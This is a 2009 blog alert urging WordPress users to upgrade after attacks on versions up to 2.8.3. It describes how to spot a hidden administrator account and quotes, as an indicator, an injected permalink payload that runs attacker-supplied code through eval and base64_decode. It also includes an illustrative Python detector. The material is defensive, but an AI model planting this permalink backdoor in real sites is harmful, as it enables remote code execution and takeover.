ALERT: Old WordPress Blogs Under Attack

All WordPress blogs up to version 2.8.3 are reportedly being attacked and hacked.

The latest WordPress version 2.8.4 seems to be SAFE.

The blogs on WordPress.com are SAFE as the WordPress.com system is up-to-date.

Thank you so much to Lorelle on WP for making a post about this, which is how I got the news (check Lorelle's post for all the info).

Update to the Latest WordPress Version

Here's what you need to do if you have blog(s) that are not updated to the latest WordPress version:

  • Before you continue reading,
  • Go and update ALL YOUR WORDPRESS BLOGS to version 2.8.4.
  • Really, stop reading, it IS that serious.
  • Continue reading after you have UPGRADED your WordPress to the latest version.

Recognizing The Attack

Two clues have been recognized to spot if you've already been hacked (here's hoping you haven't been):

  • new administrator
    • A “back door” was created by a “hidden” Administrator.
    • Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
  • permalinks (Settings --> Permalinks):
    • The keywords to look for are “eval” and “base64_decode,” as in this example:

example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
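As an added example (not from the original post, Lorelle's post or WordPress itself), this Python script checks for both clues: it flags a permalink structure that contains the two keywords or characters outside the normal structure tags, and lists administrator accounts you did not create. It assumes you have exported the permalink structure setting and the user/role rows from your own site; the function names, the serialized role format shown and the sample users are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Structure tags WordPress accepts in Settings --> Permalinks.
KNOWN_TAGS = ("%year%", "%monthnum%", "%day%", "%hour%", "%minute%", "%second%",
              "%post_id%", "%postname%", "%category%", "%tag%", "%author%")
KEYWORDS = ("eval", "base64_decode")  # the two keywords named in the post


def check_permalink(structure):
    """Return a list of reasons the permalink structure looks tampered with."""
    rest = structure
    # Remove legitimate tags first: "%category%" and "%day%" begin with valid
    # hex pairs (%ca, %da) and would be mangled by percent-decoding.
    for tag in KNOWN_TAGS:
        rest = rest.replace(tag, "")
    # Decode repeatedly so %7B and double-encoded %257B both become "{".
    for _ in range(3):
        rest = unquote(rest)
    lowered = rest.lower()
    reasons = ["keyword: " + k for k in KEYWORDS if k in lowered]
    leftover = sorted(set(re.findall(r"[^a-z0-9/_.\-]", lowered)))
    if leftover:
        reasons.append("unexpected characters: " + "".join(leftover))
    return reasons


def unknown_admins(users, expected):
    """users: (login, role value) rows; expected: admin logins you created."""
    expected = {name.lower() for name in expected}
    return [login for login, caps in users
            if '"administrator"' in caps and login.lower() not in expected]


# Constructed sample data (the permalink tail is the example quoted in the post).
SAMPLE_PERMALINK = ("/%category%/%postname%/%&(%7B$%7Beval(base64_decode("
                    "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
SAMPLE_USERS = [  # hypothetical accounts; role format is an assumption
    ("admin", 'a:1:{s:13:"administrator";b:1;}'),
    ("guestwriter", 'a:1:{s:6:"author";b:1;}'),
    ("wpsupport2", 'a:1:{s:13:"administrator";b:1;}'),
]

if __name__ == "__main__":
    print(check_permalink("/%year%/%monthnum%/%postname%/"))
    print(check_permalink(SAMPLE_PERMALINK))
    print(unknown_admins(SAMPLE_USERS, expected=["admin"]))
```

A clean result from this check does not replace the upgrade to 2.8.4; it only tells you whether the two clues described above are present.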

Secure Your Blog

The News Updates

2009-09-04: News reported on the WordPress.org Support Forums: HACK WARNING: UPGRADE IMMEDIATELY:

if you don't upgrade, you will get hacked. It's not a matter of "if", it's a matter of "when". Don't wait to be hacked.

2009-09-05: WordPress development blog: How to Keep WordPress Secure

Spread the News!

We need to make sure everyone is informed about this. But stick to the facts, which at the moment are:

  • Old WordPress blogs up to 2.8.3 are reportedly being attacked
  • WP version 2.8.4 seems to be safe

Re-Tweet to make sure EVERY WordPress blogger is aware of this.

And always, always keep your WordPress and plugins in your blog updated to the latest version!

Read all about this here: Old WordPress Versions Under Attack via Lorelle on WP

Original Warning / News on the WordPress.org Forum: HACK WARNING: UPGRADE IMMEDIATELY
